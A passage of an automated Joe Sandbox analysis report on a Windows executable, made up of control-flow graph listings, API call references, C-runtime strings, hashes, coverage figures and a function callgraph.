7ff7b9e8156c 3681->3682 3683 7ff7b9e81394 2 API calls 3682->3683 3684 7ff7b9e8157b 3683->3684 3685 7ff7b9e81394 2 API calls 3684->3685 3686 7ff7b9e8158a 3685->3686 3687 7ff7b9e81394 2 API calls 3686->3687 3688 7ff7b9e81599 3687->3688 3689 7ff7b9e81394 2 API calls 3688->3689 3690 7ff7b9e815a8 3689->3690 3691 7ff7b9e81394 2 API calls 3690->3691 3692 7ff7b9e815b7 3691->3692 3693 7ff7b9e81394 2 API calls 3692->3693 3694 7ff7b9e815c6 3693->3694 3695 7ff7b9e81394 2 API calls 3694->3695 3696 7ff7b9e815d5 3695->3696 3697 7ff7b9e81394 2 API calls 
3696->3697 3698 7ff7b9e815e4 3697->3698 3699 7ff7b9e81394 2 API calls 3698->3699 3700 7ff7b9e815f3 3699->3700 3700->3199 3702 7ff7b9e81394 2 API calls 3701->3702 3703 7ff7b9e815d5 3702->3703 3704 7ff7b9e81394 2 API calls 3703->3704 3705 7ff7b9e815e4 3704->3705 3706 7ff7b9e81394 2 API calls 3705->3706 3707 7ff7b9e815f3 3706->3707 3707->3200 3726 7ff7b9e81000 3727 7ff7b9e8108b __set_app_type 3726->3727 3728 7ff7b9e81040 3726->3728 3729 7ff7b9e810b6 3727->3729 3728->3727 3730 7ff7b9e810e5 3729->3730 3732 7ff7b9e81e00 3729->3732 3733 7ff7b9e888b0 __setusermatherr 3732->3733 3734 7ff7b9e81800 3735 7ff7b9e81812 3734->3735 3736 7ff7b9e81835 fprintf 3735->3736 3811 7ff7b9e82320 strlen 3812 7ff7b9e82337 3811->3812

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                  • String ID:
                                                                  • API String ID: 2643109117-0
                                                                  • Opcode ID: 7dc0e20ee06a047c58c8969f60c7aa9bc1c695feb4ea1f1336e2537d86a415e6
                                                                  • Instruction ID: 43b679c6e2c5fea81ba0842aff91cf32def790b2e3f4234c4ff907f48e5a9fef
                                                                  • Opcode Fuzzy Hash: 7dc0e20ee06a047c58c8969f60c7aa9bc1c695feb4ea1f1336e2537d86a415e6
                                                                  • Instruction Fuzzy Hash: 04511132D1968685F651BF9DE9D8279F3B1AF66780F908131DF2D47399DE2CA4418320

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • NtQuerySecurityPolicy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B9E81156), ref: 00007FF7B9E813F7
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: PolicyQuerySecurity
                                                                  • String ID:
                                                                  • API String ID: 1045350227-0
                                                                  • Opcode ID: 856890430328471108b496156552b481e7f8763a777f6ca6df0782f1e0c8bf26
                                                                  • Instruction ID: 1d006f7d40dbb2170babc4b605331b74fab6a8af53618dd3417b20dac663e4e1
                                                                  • Opcode Fuzzy Hash: 856890430328471108b496156552b481e7f8763a777f6ca6df0782f1e0c8bf26
                                                                  • Instruction Fuzzy Hash: 9CF0FB32918B82C1D614EFA6F8D402AF371FB66340B444435EAAC02729DF3CD0508B50

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                  • String ID: 0$Cj$$X$`
                                                                  • API String ID: 329590056-3100607097
                                                                  • Opcode ID: b8983a0e767351e41f8a2dd7f3a744f191a8cf509c30d2e12db373b54b78512d
                                                                  • Instruction ID: b050647696afef926b4d9a715977dfb4282b03e168ee31d3688e8b3720907131
                                                                  • Opcode Fuzzy Hash: b8983a0e767351e41f8a2dd7f3a744f191a8cf509c30d2e12db373b54b78512d
                                                                  • Instruction Fuzzy Hash: D7028F22918BC581F360AF69E8843AAF7A0FB96794F904235DBAC077A9DF3CD145C710

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: memset$wcscatwcscpywcslen
                                                                  • String ID: $0$0$@$@
                                                                  • API String ID: 4263182637-1413854666
                                                                  • Opcode ID: 70e93ec6abdd1a4cc0d18cd6ed6ff85189439c08585699d39736934ea620586d
                                                                  • Instruction ID: 02a3c9120e221cd643b38c30999a9d228df5638b6e4c34464379bda2508b693e
                                                                  • Opcode Fuzzy Hash: 70e93ec6abdd1a4cc0d18cd6ed6ff85189439c08585699d39736934ea620586d
                                                                  • Instruction Fuzzy Hash: CAB1AE2291CAC585F361AF68F4893ABF7B0FBA2344F901135EB88466A9DF7DD145CB10

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,?,?,00007FF7B9E8A4DC,00007FF7B9E8A4DC,?,?,00007FF7B9E80000,?,00007FF7B9E81991), ref: 00007FF7B9E81C63
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,00007FF7B9E8A4DC,00007FF7B9E8A4DC,?,?,00007FF7B9E80000,?,00007FF7B9E81991), ref: 00007FF7B9E81CC7
                                                                  • memcpy.MSVCRT ref: 00007FF7B9E81CE0
                                                                  • GetLastError.KERNEL32(?,?,?,?,00007FF7B9E8A4DC,00007FF7B9E8A4DC,?,?,00007FF7B9E80000,?,00007FF7B9E81991), ref: 00007FF7B9E81D23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 2595394609-2123141913
                                                                  • Opcode ID: 60cf6631d5d8fe02d76019b25bf8b166b3865f8fdb2b66b6f59c16a09724d6a7
                                                                  • Instruction ID: 8e2ed838cec8b79eaa545eccb224a29c91c5706ab4e410f893cea13869b3331f
                                                                  • Opcode Fuzzy Hash: 60cf6631d5d8fe02d76019b25bf8b166b3865f8fdb2b66b6f59c16a09724d6a7
                                                                  • Instruction Fuzzy Hash: 19418662A0898685FA55BF89D4CC6B8F7B0EB66B80F958135DF1D43399DE3CE541C320

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                  • String ID:
                                                                  • API String ID: 3326252324-0
                                                                  • Opcode ID: 277a831d8e060c36ae463728c8f60050fbb842899c4e9a066aa8a6c99444941f
                                                                  • Instruction ID: 814024a721cf0f92dd9015abebc40a153c3a33dba64aa98fe2c4657971a7c49b
                                                                  • Opcode Fuzzy Hash: 277a831d8e060c36ae463728c8f60050fbb842899c4e9a066aa8a6c99444941f
                                                                  • Instruction Fuzzy Hash: FC210122E0D98681FA55BF89A5C8234F271BF26B81FD54570CF2D47768DF7DA8468230

                                                                  Control-flow Graph

                                                                  control_flow_graph 640 7ff7b9e88320-7ff7b9e8833c 641 7ff7b9e8836b-7ff7b9e8838f call 7ff7b9e88310 640->641 642 7ff7b9e8833e 640->642 647 7ff7b9e885b6-7ff7b9e885c8 641->647 649 7ff7b9e88395-7ff7b9e883a9 call 7ff7b9e88310 641->649 644 7ff7b9e88345-7ff7b9e8834a 642->644 645 7ff7b9e88350-7ff7b9e88353 644->645 645->647 648 7ff7b9e88359-7ff7b9e8835f 645->648 648->645 650 7ff7b9e88361-7ff7b9e88366 648->650 653 7ff7b9e883bf-7ff7b9e883d1 649->653 650->647 654 7ff7b9e883b3-7ff7b9e883bd 653->654 655 7ff7b9e883d3-7ff7b9e883ed call 7ff7b9e88310 653->655 654->653 656 7ff7b9e88415-7ff7b9e88418 654->656 661 7ff7b9e883ef-7ff7b9e88411 call 7ff7b9e88310 * 2 655->661 662 7ff7b9e883b0 655->662 656->647 658 7ff7b9e8841e-7ff7b9e8844a call 7ff7b9e88310 malloc 656->658 666 7ff7b9e88450-7ff7b9e88452 658->666 667 7ff7b9e885ac 658->667 661->654 672 7ff7b9e88413 661->672 662->654 666->667 669 7ff7b9e88458-7ff7b9e88488 call 7ff7b9e88310 * 2 666->669 667->647 676 7ff7b9e88490-7ff7b9e884a7 669->676 672->658 677 7ff7b9e88583-7ff7b9e8858b 676->677 678 7ff7b9e884ad-7ff7b9e884b3 676->678 681 7ff7b9e88596-7ff7b9e885a4 677->681 682 7ff7b9e8858d-7ff7b9e88590 677->682 679 7ff7b9e88502 678->679 680 7ff7b9e884b5-7ff7b9e884d3 call 7ff7b9e88310 678->680 685 7ff7b9e88507-7ff7b9e88549 call 7ff7b9e88310 * 2 679->685 688 7ff7b9e884e0-7ff7b9e884fe 680->688 681->644 684 7ff7b9e885aa 681->684 682->676 682->681 684->647 693 7ff7b9e88578-7ff7b9e8857f 685->693 694 7ff7b9e8854b 685->694 688->688 690 7ff7b9e88500 688->690 690->685 693->677 695 7ff7b9e88550-7ff7b9e8855c 694->695 696 7ff7b9e88573 695->696 697 7ff7b9e8855e-7ff7b9e88571 695->697 696->693 697->695 697->696
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: malloc
                                                                  • String ID: =$$Cj$$i$$i$
                                                                  • API String ID: 2803490479-1879266049
                                                                  • Opcode ID: a12c45f0e63f0545611badf4b31fa90aab6001f018c5534414d701305adcf2b0
                                                                  • Instruction ID: 40dfd093b9e23d49176ba14a5e8ce57387095e25e2cf16aea7493583e5acdc59
                                                                  • Opcode Fuzzy Hash: a12c45f0e63f0545611badf4b31fa90aab6001f018c5534414d701305adcf2b0
                                                                  • Instruction Fuzzy Hash: F571F527A285918BD754BF9894D463AF6B1FB69B48F844134EF7E43389DE38E840C760

                                                                  Control-flow Graph

                                                                  control_flow_graph 730 7ff7b9e81e10-7ff7b9e81e2d 731 7ff7b9e81e3e-7ff7b9e81e48 730->731 732 7ff7b9e81e2f-7ff7b9e81e38 730->732 734 7ff7b9e81e4a-7ff7b9e81e53 731->734 735 7ff7b9e81ea3-7ff7b9e81ea8 731->735 732->731 733 7ff7b9e81f60-7ff7b9e81f69 732->733 736 7ff7b9e81ecc-7ff7b9e81ed1 734->736 737 7ff7b9e81e55-7ff7b9e81e60 734->737 735->733 738 7ff7b9e81eae-7ff7b9e81eb3 735->738 739 7ff7b9e81f23-7ff7b9e81f2d 736->739 740 7ff7b9e81ed3-7ff7b9e81ee2 signal 736->740 737->735 741 7ff7b9e81efb-7ff7b9e81f0a call 7ff7b9e888c0 738->741 742 7ff7b9e81eb5-7ff7b9e81eba 738->742 745 7ff7b9e81f43-7ff7b9e81f45 739->745 746 7ff7b9e81f2f-7ff7b9e81f3f 739->746 740->739 743 7ff7b9e81ee4-7ff7b9e81ee8 740->743 741->739 751 7ff7b9e81f0c-7ff7b9e81f10 741->751 742->733 747 7ff7b9e81ec0 742->747 748 7ff7b9e81f4e-7ff7b9e81f53 743->748 749 7ff7b9e81eea-7ff7b9e81ef9 signal 743->749 745->733 746->745 747->739 752 7ff7b9e81f5a 748->752 749->733 753 7ff7b9e81f55 751->753 754 7ff7b9e81f12-7ff7b9e81f21 signal 751->754 752->733 753->752 754->733
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmp
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CCG
                                                                  • API String ID: 0-1584390748
                                                                  • Opcode ID: dcece1a9a345dc98801b2edf6f2fa389c4cd27cf161fb8fe92b3b520b557ff1a
                                                                  • Instruction ID: 9dd2876aa0cdab94742cae3921b8c66e1756fcf53776e4803c0f410e1ce9a975
                                                                  • Opcode Fuzzy Hash: dcece1a9a345dc98801b2edf6f2fa389c4cd27cf161fb8fe92b3b520b557ff1a
                                                                  • Instruction Fuzzy Hash: 30216223E0C18645FA757A9C95C8379D162AFA67A4FA4C131EF3D432DDDE2CB8C18261

Control-flow Graph

APIs
• VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B9E81247), ref: 00007FF7B9E819F9
Strings
Memory Dump Source
• Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
• Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
• API String ID: 544645111-395989641
• Opcode ID: 287094a85b2253c4f613aac48dc49c5c0556f702c10d22a5b68489503c3bbe79
• Instruction ID: 1c9ec08cc3bff795f1bd53886a71b10e0a9efc0da840967d0b0fe5a918bea03d
• Opcode Fuzzy Hash: 287094a85b2253c4f613aac48dc49c5c0556f702c10d22a5b68489503c3bbe79
• Instruction Fuzzy Hash: CA514023E08586D6EB10AF99E8C87A4F771AB26794F948171DA2C0779DCA3CE581C720

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
• Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
Similarity
• API ID: fprintf
• String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
• API String ID: 383729395-3474627141
• Opcode ID: 237c5e502358bb01a7dc05c2455ca96dc5b88e708203c1fe0ae604449a937fb0
• Instruction ID: 14a8e4f1b1ec25760aad3ea15bcde6141838af5c9226f3c58977c3f7d27d8a9b
• Opcode Fuzzy Hash: 237c5e502358bb01a7dc05c2455ca96dc5b88e708203c1fe0ae604449a937fb0
• Instruction Fuzzy Hash: 82F0A412E1C98582E610BFA8A9C90B9E371EB6A3C0F819231EF5D5325ADF1CE1428310

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
• Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
Similarity
• API ID: CriticalSection$EnterErrorLastLeaveValue
• String ID:
• API String ID: 682475483-0
• Opcode ID: 2933b585481871f5a4bb6ffdf32d253fb7c79dcb43ada2d5c520729cfe6986fd
• Instruction ID: d15ade8a9a16aa53e77419b0faa3e39f787c6cf13e0f489a26ff96204b616198
• Opcode Fuzzy Hash: 2933b585481871f5a4bb6ffdf32d253fb7c79dcb43ada2d5c520729cfe6986fd
• Instruction Fuzzy Hash: D9010027A0D98281FA55BF89A9C8134F2B0AB26BD1FD54171CF2D4375CDF3CA8568230

Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 851
Total number of Limit Nodes: 2
2708->2709 2710 14000145e 2709->2710 2711 140001394 2 API calls 2710->2711 2712 14000146d 2711->2712 2713 140001394 2 API calls 2712->2713 2714 14000147c 2713->2714 2715 140001394 2 API calls 2714->2715 2716 14000148b 2715->2716 2717 140001394 2 API calls 2716->2717 2718 14000149a 2717->2718 2719 140001394 2 API calls 2718->2719 2720 1400014a9 2719->2720 2721 140001394 2 API calls 2720->2721 2722 1400014b8 2721->2722 2723 140001394 2 API calls 2722->2723 2724 1400014c7 2723->2724 2725 140001394 2 API calls 2724->2725 2726 1400014d6 2725->2726 2727 1400014e5 2726->2727 2728 140001394 2 API calls 2726->2728 2729 140001394 2 API calls 2727->2729 2728->2727 2730 1400014ef 2729->2730 2731 1400014f4 2730->2731 2732 140001394 2 API calls 2730->2732 2733 140001394 2 API calls 2731->2733 2732->2731 2734 1400014fe 2733->2734 2735 140001503 2734->2735 2736 140001394 2 API calls 2734->2736 2737 140001394 2 API calls 2735->2737 2736->2735 2738 14000150d 2737->2738 2739 140001394 2 API calls 2738->2739 2740 140001512 2739->2740 2741 140001394 2 API calls 2740->2741 2742 140001521 2741->2742 2743 140001394 2 API calls 2742->2743 2744 140001530 2743->2744 2745 140001394 2 API calls 2744->2745 2746 14000153f 2745->2746 2747 140001394 2 API calls 2746->2747 2748 14000154e 2747->2748 2749 140001394 2 API calls 2748->2749 2750 14000155d 2749->2750 2751 140001394 2 API calls 2750->2751 2752 14000156c 2751->2752 2753 140001394 2 API calls 2752->2753 2754 14000157b 2753->2754 2755 140001394 2 API calls 2754->2755 2756 14000158a 2755->2756 2757 140001394 2 API calls 2756->2757 2758 140001599 2757->2758 2759 140001394 2 API calls 2758->2759 2760 1400015a8 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015b7 2761->2762 2763 140001394 2 API calls 2762->2763 2764 1400015c6 2763->2764 2765 140001394 2 API calls 2764->2765 2766 1400015d5 2765->2766 2767 140001394 2 API calls 2766->2767 2768 1400015e4 2767->2768 2769 140001394 2 API calls 2768->2769 2770 1400015f3 2769->2770 
2770->2242 2772 140001394 2 API calls 2771->2772 2773 140001440 2772->2773 2774 140001394 2 API calls 2773->2774 2775 14000144f 2774->2775 2776 140001394 2 API calls 2775->2776 2777 14000145e 2776->2777 2778 140001394 2 API calls 2777->2778 2779 14000146d 2778->2779 2780 140001394 2 API calls 2779->2780 2781 14000147c 2780->2781 2782 140001394 2 API calls 2781->2782 2783 14000148b 2782->2783 2784 140001394 2 API calls 2783->2784 2785 14000149a 2784->2785 2786 140001394 2 API calls 2785->2786 2787 1400014a9 2786->2787 2788 140001394 2 API calls 2787->2788 2789 1400014b8 2788->2789 2790 140001394 2 API calls 2789->2790 2791 1400014c7 2790->2791 2792 140001394 2 API calls 2791->2792 2793 1400014d6 2792->2793 2794 1400014e5 2793->2794 2795 140001394 2 API calls 2793->2795 2796 140001394 2 API calls 2794->2796 2795->2794 2797 1400014ef 2796->2797 2798 1400014f4 2797->2798 2799 140001394 2 API calls 2797->2799 2800 140001394 2 API calls 2798->2800 2799->2798 2801 1400014fe 2800->2801 2802 140001503 2801->2802 2803 140001394 2 API calls 2801->2803 2804 140001394 2 API calls 2802->2804 2803->2802 2805 14000150d 2804->2805 2806 140001394 2 API calls 2805->2806 2807 140001512 2806->2807 2808 140001394 2 API calls 2807->2808 2809 140001521 2808->2809 2810 140001394 2 API calls 2809->2810 2811 140001530 2810->2811 2812 140001394 2 API calls 2811->2812 2813 14000153f 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000154e 2814->2815 2816 140001394 2 API calls 2815->2816 2817 14000155d 2816->2817 2818 140001394 2 API calls 2817->2818 2819 14000156c 2818->2819 2820 140001394 2 API calls 2819->2820 2821 14000157b 2820->2821 2822 140001394 2 API calls 2821->2822 2823 14000158a 2822->2823 2824 140001394 2 API calls 2823->2824 2825 140001599 2824->2825 2826 140001394 2 API calls 2825->2826 2827 1400015a8 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015b7 2828->2829 2830 140001394 2 API calls 2829->2830 2831 1400015c6 2830->2831 2832 140001394 2 API calls 
2831->2832 2833 1400015d5 2832->2833 2834 140001394 2 API calls 2833->2834 2835 1400015e4 2834->2835 2836 140001394 2 API calls 2835->2836 2837 1400015f3 2836->2837 2837->2242

                                                                  Callgraph

                                                                  callgraph 0 Function_00000001400058E1 1 Function_00000001400057E1 2 Function_0000000140001AE4 35 Function_0000000140001D40 2->35 76 Function_0000000140001BA0 2->76 3 Function_00000001400014E5 72 Function_0000000140001394 3->72 4 Function_0000000140005CF0 29 Function_0000000140005A30 4->29 5 Function_00000001400010F0 6 Function_00000001400030F1 7 Function_00000001400014F4 7->72 8 Function_0000000140001E00 9 Function_0000000140002F00 58 Function_0000000140001370 9->58 10 Function_0000000140001000 10->8 39 Function_0000000140001750 10->39 81 Function_0000000140001FB0 10->81 88 Function_0000000140001FC0 10->88 11 Function_0000000140001800 67 Function_0000000140002290 11->67 12 Function_0000000140002500 13 Function_0000000140005801 14 Function_0000000140005701 15 Function_0000000140001503 15->72 16 Function_0000000140001404 16->72 17 Function_0000000140002104 18 Function_0000000140001E10 19 Function_0000000140003110 20 Function_0000000140005A10 21 Function_0000000140001512 21->72 22 Function_0000000140002320 23 Function_0000000140002420 24 Function_0000000140001521 24->72 25 Function_0000000140005821 26 Function_0000000140001422 26->72 27 Function_0000000140001530 27->72 28 Function_0000000140003130 30 Function_0000000140001431 30->72 31 Function_0000000140005731 32 Function_000000014000153F 32->72 33 Function_0000000140001440 33->72 34 Function_0000000140005A40 34->29 35->67 36 Function_0000000140001140 51 Function_0000000140001160 36->51 37 Function_0000000140005841 38 Function_0000000140001F47 57 Function_0000000140001870 38->57 40 Function_0000000140003150 40->9 40->15 40->24 40->26 40->27 40->29 40->30 40->32 40->33 48 Function_000000014000145E 40->48 50 Function_0000000140002660 40->50 54 Function_000000014000156C 40->54 55 Function_000000014000146D 40->55 40->58 64 Function_000000014000157B 40->64 78 Function_00000001400015A8 40->78 79 Function_00000001400014A9 40->79 87 Function_00000001400016C0 
